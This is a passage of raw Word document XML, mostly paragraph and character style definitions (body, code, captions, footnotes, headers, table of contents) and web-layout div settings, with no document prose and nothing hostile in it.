    <w:pPr>
      <w:numPr>
        <w:numId w:val="2"/>
      </w:numPr>
    </w:pPr>
    <w:rPr>
      <w:b/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="bodyChar">
    <w:name w:val="body Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="body"/>
    <w:rsid w:val="00DE5A50"/>
    <w:rPr>
      <w:rFonts w:ascii="Constantia" w:hAnsi="Constantia" w:cs="Times New Roman"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Style1">
    <w:name w:val="Style1"/>
    <w:basedOn w:val="bodyChar"/>
    <w:uiPriority w:val="1"/>
    <w:rsid w:val="00604C58"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:i/>
      <w:color w:val="4F81BD" w:themeColor="accent1"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="H1Char">
    <w:name w:val="H1 Char"/>
    <w:basedOn w:val="bodyChar"/>
    <w:link w:val="H1"/>
    <w:rsid w:val="00604C58"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:b/>
      <w:color w:val="4F81BD" w:themeColor="accent1"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="EndnoteText">
    <w:name w:val="endnote text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="EndnoteTextChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00604C58"/>
    <w:pPr>
      <w:spacing w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="EndnoteTextChar">
    <w:name w:val="Endnote Text Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="EndnoteText"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00604C58"/>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="EndnoteReference">
    <w:name w:val="endnote reference"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00604C58"/>
    <w:rPr>
      <w:vertAlign w:val="superscript"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="FootnoteText">
    <w:name w:val="footnote text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FootnoteTextChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00864054"/>
    <w:pPr>
      <w:spacing w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="FootnoteTextChar">
    <w:name w:val="Footnote Text Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="FootnoteText"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00864054"/>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="FootnoteReference">
    <w:name w:val="footnote reference"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00864054"/>
    <w:rPr>
      <w:vertAlign w:val="superscript"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Caption">
    <w:name w:val="caption"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="CaptionChar"/>
    <w:uiPriority w:val="35"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00864054"/>
    <w:pPr>
      <w:spacing w:after="200" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="1F497D" w:themeColor="text2"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Fakeheading">
    <w:name w:val="Fake heading"/>
    <w:basedOn w:val="Heading1"/>
    <w:link w:val="FakeheadingChar"/>
    <w:qFormat/>
    <w:rsid w:val="004E4FA6"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="content">
    <w:name w:val="content"/>
    <w:basedOn w:val="body"/>
    <w:link w:val="contentChar"/>
    <w:rsid w:val="008227E1"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading1Char">
    <w:name w:val="Heading 1 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading1"/>
    <w:rsid w:val="005D2D2A"/>
    <w:rPr>
      <w:rFonts w:ascii="Constantia" w:hAnsi="Constantia"/>
      <w:caps/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="40"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="FakeheadingChar">
    <w:name w:val="Fake heading Char"/>
    <w:basedOn w:val="Heading1Char"/>
    <w:link w:val="Fakeheading"/>
    <w:rsid w:val="004E4FA6"/>
    <w:rPr>
      <w:rFonts w:ascii="Constantia" w:hAnsi="Constantia"/>
      <w:caps/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="40"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="figures">
    <w:name w:val="figures"/>
    <w:basedOn w:val="body"/>
    <w:link w:val="figuresChar"/>
    <w:qFormat/>
    <w:rsid w:val="001E0963"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="contentChar">
    <w:name w:val="content Char"/>
    <w:basedOn w:val="bodyChar"/>
    <w:link w:val="content"/>
    <w:rsid w:val="008227E1"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:color w:val="4F81BD" w:themeColor="accent1"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="code">
    <w:name w:val="code"/>
    <w:basedOn w:val="body"/>
    <w:link w:val="codeChar"/>
    <w:qFormat/>
    <w:rsid w:val="000B2140"/>
    <w:pPr>
      <w:spacing w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="figuresChar">
    <w:name w:val="figures Char"/>
    <w:basedOn w:val="bodyChar"/>
    <w:link w:val="figures"/>
    <w:rsid w:val="001E0963"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="figuretext">
    <w:name w:val="figure_text"/>
    <w:basedOn w:val="Caption"/>
    <w:link w:val="figuretextChar"/>
    <w:qFormat/>
    <w:rsid w:val="006A4DF3"/>
    <w:rPr>
      <w:rFonts w:ascii="Palatino Linotype" w:hAnsi="Palatino Linotype"/>
      <w:color w:val="auto"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="codeChar">
    <w:name w:val="code Char"/>
    <w:basedOn w:val="bodyChar"/>
    <w:link w:val="code"/>
    <w:rsid w:val="000B2140"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="HTMLPreformatted">
    <w:name w:val="HTML Preformatted"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HTMLPreformattedChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00C61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CaptionChar">
    <w:name w:val="Caption Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Caption"/>
    <w:uiPriority w:val="35"/>
    <w:rsid w:val="008B3BD0"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="1F497D" w:themeColor="text2"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="figuretextChar">
    <w:name w:val="figure_text Char"/>
    <w:basedOn w:val="CaptionChar"/>
    <w:link w:val="figuretext"/>
    <w:rsid w:val="006A4DF3"/>
    <w:rPr>
      <w:rFonts w:ascii="Palatino Linotype" w:hAnsi="Palatino Linotype"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="1F497D" w:themeColor="text2"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="HTMLPreformattedChar">
    <w:name w:val="HTML Preformatted Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="HTMLPreformatted"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00C61194"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOCHeading">
    <w:name w:val="TOC Heading"/>
    <w:basedOn w:val="Heading1"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00DE5A50"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="0"/>
      </w:numPr>
      <w:spacing w:before="240" w:after="0" w:line="259" w:lineRule="auto"/>
      <w:outlineLvl w:val="9"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:szCs w:val="32"/>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC1">
    <w:name w:val="toc 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00326004"/>
    <w:pPr>
      <w:spacing w:after="100"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC2">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00326004"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="220"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC3">
    <w:name w:val="toc 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00326004"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="440"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00326004"/>
    <w:rPr>
      <w:color w:val="0000FF" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Header">
    <w:name w:val="header"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HeaderChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="003A6EB4"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4680"/>
        <w:tab w:val="right" w:pos="9360"/>
      </w:tabs>
      <w:spacing w:line="240" w:lineRule="auto"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="HeaderChar">
    <w:name w:val="Header Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Header"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="003A6EB4"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="003A6EB4"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4680"/>
        <w:tab w:val="right" w:pos="9360"/>
      </w:tabs>
      <w:spacing w:line="240" w:lineRule="auto"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="FooterChar">
    <w:name w:val="Footer Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Footer"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="003A6EB4"/>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="004E4FA6"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="codeblock">
    <w:name w:val="code_block"/>
    <w:basedOn w:val="code"/>
    <w:link w:val="codeblockChar"/>
    <w:qFormat/>
    <w:rsid w:val="001E0963"/>
    <w:pPr>
      <w:keepNext/>
      <w:ind w:firstLine="0"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="codeblockChar">
    <w:name w:val="code_block Char"/>
    <w:basedOn w:val="codeChar"/>
    <w:link w:val="codeblock"/>
    <w:rsid w:val="001E0963"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consola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0195">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="73748373">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="106895087">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="108932571">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="117187393">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="124812067">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="161046947">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="274949259">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="334573529">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="339241254">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="363139495">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="363748514">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="364719622">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="403649277">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="446318949">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="449784174">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="486868128">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="500200832">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="535309333">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="569730182">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="625893966">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="671445345">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="764113383">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1668047043">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="298994576">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="153434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857021">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="856503145">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="900094181">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
